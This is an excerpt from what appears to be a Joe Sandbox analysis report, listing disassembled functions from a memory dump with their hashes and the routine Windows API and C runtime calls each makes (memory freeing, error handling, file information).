                                                                                                                                                                                      • Opcode Fuzzy Hash: de5651d35cfa5f9dbb13834f95bfff89481b7c04ca3aa9e7762e7f82cdebb0ef
                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F08234600219FBEB619B55D90DB9E7EA8EB44795F000194FA41A6060CB798E01EB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 597776487-0
                                                                                                                                                                                      • Opcode ID: 3e6b7b2a031e558d45306a5a12d2629677490bf75be638601959d6088f96df1f
                                                                                                                                                                                      • Instruction ID: b6cf754040836d4c823b2f19dfecffa4ded5fc0a52c8ea28585168ab8464914c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e6b7b2a031e558d45306a5a12d2629677490bf75be638601959d6088f96df1f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18C12671E0024A9BEB219F6DD840AEE7BEDFF55350F18409AE5C9EF281E7358A41C790
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCPInfo.KERNEL32(00CB1960,00CB1960,?,7FFFFFFF,?,?,01065FD5,00CB1960,00CB1960,?,00CB1960,?,?,?,?,00CB1960), ref: 01065DBC
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 01065E72
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 01065F08
                                                                                                                                                                                      • __freea.LIBCMT ref: 01065F73
                                                                                                                                                                                      • __freea.LIBCMT ref: 01065F7F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2330168043-0
                                                                                                                                                                                      • Opcode ID: 46d12ac6c51dbc75753c9a01fe1ed93cd0e350c0659b0c33e6f5ca301800d0bc
                                                                                                                                                                                      • Instruction ID: 47d86a2884524d90b031816eae7fd8e3dbc5dfa95ee5e0664337586d24f18ede
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46d12ac6c51dbc75753c9a01fe1ed93cd0e350c0659b0c33e6f5ca301800d0bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: AC81B27290020A9FEF719FA8CC44AEE7BFDDF59790F184195E985A7280E721C841CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 010646C8
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0106478E
                                                                                                                                                                                      • __freea.LIBCMT ref: 010647FA
                                                                                                                                                                                        • Part of subcall function 0105D7EA: HeapAlloc.KERNEL32(00000000,?,?,?,01057F22,?,?,?,?,?,010420C3,?,?), ref: 0105D81C
                                                                                                                                                                                      • __freea.LIBCMT ref: 01064803
                                                                                                                                                                                      • __freea.LIBCMT ref: 01064826
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                                                                      • Opcode ID: 17d1a49a98427d3700a47ce24814e3a41ae1b1d701ad67b0992aa6b31b08c7c2
                                                                                                                                                                                      • Instruction ID: dc243039b0967c1d2c6cde97e57cce61316c3facd2f9a3114c8d1c5e3324e28e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d1a49a98427d3700a47ce24814e3a41ae1b1d701ad67b0992aa6b31b08c7c2
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF51CE72A00256AFEB619E68DC40EEF3AEEEF89650F150169FE84E7140E774DC50C6A1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0105AD90), ref: 0105AE80
                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 0105AEDA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0105AD90,?,000000FF,00000000,00000000), ref: 0105AF68
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105AF6F
                                                                                                                                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0105AFAC
                                                                                                                                                                                        • Part of subcall function 0105B1D6: __dosmaperr.LIBCMT ref: 0105B20B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1206951868-0
                                                                                                                                                                                      • Opcode ID: a4e71a30f801782508484be85e74f2e393a97d9dbdbf5ed72a304734e5effa9d
                                                                                                                                                                                      • Instruction ID: ef30a2a1932ea6984aff829f2423ca6581d2931e3b98633d288277014937226e
                                                                                                                                                                                      • Opcode Fuzzy Hash: a4e71a30f801782508484be85e74f2e393a97d9dbdbf5ed72a304734e5effa9d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 22413FB5A00305EFDBA4DFA5D8449AFBBF9EF89200B00852DF996D3650E734A841DB60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 01061066
                                                                                                                                                                                        • Part of subcall function 0105D301: HeapFree.KERNEL32(00000000,00000000,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?), ref: 0105D317
                                                                                                                                                                                        • Part of subcall function 0105D301: GetLastError.KERNEL32(?,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?,?), ref: 0105D329
                                                                                                                                                                                      • _free.LIBCMT ref: 01061078
                                                                                                                                                                                      • _free.LIBCMT ref: 0106108A
                                                                                                                                                                                      • _free.LIBCMT ref: 0106109C
                                                                                                                                                                                      • _free.LIBCMT ref: 010610AE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: d47def8ba408980f527c2079168840d392a615fd0a4b8d2db9a284d34eb9e5ed
                                                                                                                                                                                      • Instruction ID: 4c9a93f5905cadab0b46cb0a27f938de02172695229526d5ba581a5d7d309525
                                                                                                                                                                                      • Opcode Fuzzy Hash: d47def8ba408980f527c2079168840d392a615fd0a4b8d2db9a284d34eb9e5ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF06232A05241ABEBB0EAA9F1C8C5777EDBA447203548846F6C5E7501C776F8808754
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID: *?
                                                                                                                                                                                      • API String ID: 269201875-2564092906
                                                                                                                                                                                      • Opcode ID: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction ID: e8c20e94d1350ecaf8f52858e3b27fd790d859c38dcf93e29a6521067c65ec72
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction Fuzzy Hash: 67614D75E0021AAFDB55CFADC8805EEFBF5EF48310B2481AAD855E7341D635AE418B90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                      • Opcode ID: 9f921c0daf5835c1b05c96bef4550ea0bd07de55a12f0b248524d1eb9908b7ac
                                                                                                                                                                                      • Instruction ID: 6abae6017e8eb568efd9a1eaf5a79b9b6a38f47df330752726b4d54b8b64b18b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f921c0daf5835c1b05c96bef4550ea0bd07de55a12f0b248524d1eb9908b7ac
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8251D37260120A9FEBA98F1AD840BAB7BE4FF14311F14856EED9657290E731E850CB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C,?,B75E99D0,00000000), ref: 01044C19
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01044C80
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01044C87
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3310240892-0
                                                                                                                                                                                      • Opcode ID: b31c6067ea9fc61558034efcdd305e542e0b6d630704b0568d4a1b86e7ccb3f4
                                                                                                                                                                                      • Instruction ID: c164e68ca4dea9efd845c17ab2dff56a8ce6f65ed8dcd1d3ea373fc915d6bc15
                                                                                                                                                                                      • Opcode Fuzzy Hash: b31c6067ea9fc61558034efcdd305e542e0b6d630704b0568d4a1b86e7ccb3f4
                                                                                                                                                                                      • Instruction Fuzzy Hash: C45119B0D002089BEB24EF78DD897DDBBB5EB45310F5442A9E894E7381DB355AC08B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 01064D4E
                                                                                                                                                                                      • _free.LIBCMT ref: 01064D77
                                                                                                                                                                                      • SetEndOfFile.KERNEL32(00000000,010622AF,00000000,0105D19E,?,?,?,?,?,?,?,010622AF,0105D19E,00000000), ref: 01064DA9
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,010622AF,0105D19E,00000000,?,?,?,?,00000000), ref: 01064DC5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1547350101-0
                                                                                                                                                                                      • Opcode ID: f041c50f5e25b1e8947f3f95bf7a2b06b832550ba105918dd4aa35242e899e7b
                                                                                                                                                                                      • Instruction ID: 24119e2145304ae5452c4b9711d37e45a342f5ae7ea61ec7919cc202049a3fa9
                                                                                                                                                                                      • Opcode Fuzzy Hash: f041c50f5e25b1e8947f3f95bf7a2b06b832550ba105918dd4aa35242e899e7b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 91419672D006069BDB65BBB9CC44ADE3BEEAF64360F150555F9E4E7190EA34D4418720
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0105AABF: _free.LIBCMT ref: 0105AACD
                                                                                                                                                                                        • Part of subcall function 01060623: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010647F0,?,00000000,00000000), ref: 010606C5
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0105F6B3
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105F6BA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0105F6F9
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105F700
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 167067550-0
                                                                                                                                                                                      • Opcode ID: 8fdcd5990f600fe37d6cd4aa74fecafcb0146df10b7f483a29517eee5046067f
                                                                                                                                                                                      • Instruction ID: 17140bc73ee5c51dd5c90a256882a96a09decf5356aa6980bbfb64e2e49fa78f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdcd5990f600fe37d6cd4aa74fecafcb0146df10b7f483a29517eee5046067f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5921A17160021BBF9BA1AF759D80C6BBBEDFF042647008555FDA5D7261EB38ED408BA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,0105AA3D,00000000,?,?,?,0105ABD6,?), ref: 0105DBF7
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DC54
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DC8A
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0105ABD6,?), ref: 0105DC95
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: 146601902025476443de66f9c94291860940619dfb0746a066da3390483bc0b1
                                                                                                                                                                                      • Instruction ID: 1e47c2554ea099d4d64ce694c3a475d75bf4d01b4eaa3c3e97c4d9d8dc6eaa08
                                                                                                                                                                                      • Opcode Fuzzy Hash: 146601902025476443de66f9c94291860940619dfb0746a066da3390483bc0b1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C112C716042076AD7E167F9AC88DAB2A9EC7D06747104127FEE1D61C1DEB68C428314
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0105B4A7,0105D82D,?,?,01057F22,?,?,?,?,?,010420C3,?,?), ref: 0105DD4E
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DDAB
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DDE1
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01057F22,?,?,?,?,?,010420C3,?,?), ref: 0105DDEC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: 21f3d2bbb46bd576c6b7f2e01ad2041e162704609d00ad35433ab256d5acd64f
                                                                                                                                                                                      • Instruction ID: f61b02037982bcbffa00bd95163940b8533f129a098e8d13e387c3b715a9a7ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f3d2bbb46bd576c6b7f2e01ad2041e162704609d00ad35433ab256d5acd64f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76110C726045012AD7D177F9EC84EAB369EDBD16757114267FED1DA1C0DE368C428334
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0105E693,00000000,?,010633BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0105E544
                                                                                                                                                                                      • GetLastError.KERNEL32(?,010633BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0105E693,00000000,00000104,?), ref: 0105E54E
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105E555
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: 2835b407e714f3aac56b56ee0c4c9f2b9fc1da05871ca0d99752ae1a004a6407
                                                                                                                                                                                      • Instruction ID: 40be4612b3699f488bc985f4213d2be1e69f9b0f587b4de9370cff490c3358d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2835b407e714f3aac56b56ee0c4c9f2b9fc1da05871ca0d99752ae1a004a6407
                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F08132600216BBCBB05FA6CC0889BFFADFF542A03008110F9D9C6020EB31E961DBD0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0105E693,00000000,?,01063347,00000000,00000000,0105E693,?,?,00000000,00000000,00000001), ref: 0105E5AD
                                                                                                                                                                                      • GetLastError.KERNEL32(?,01063347,00000000,00000000,0105E693,?,?,00000000,00000000,00000001,00000000,00000000,?,0105E693,00000000,00000104), ref: 0105E5B7
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0105E5BE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: 90a8c913f64250c7f82b2e7f7440690792b966e4411b5c5b0484d192e3563e33
                                                                                                                                                                                      • Instruction ID: 8b7442372ae8a02839e829c0e7bdc330ddbedb0777cd8c057a7f18019e8a1cf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 90a8c913f64250c7f82b2e7f7440690792b966e4411b5c5b0484d192e3563e33
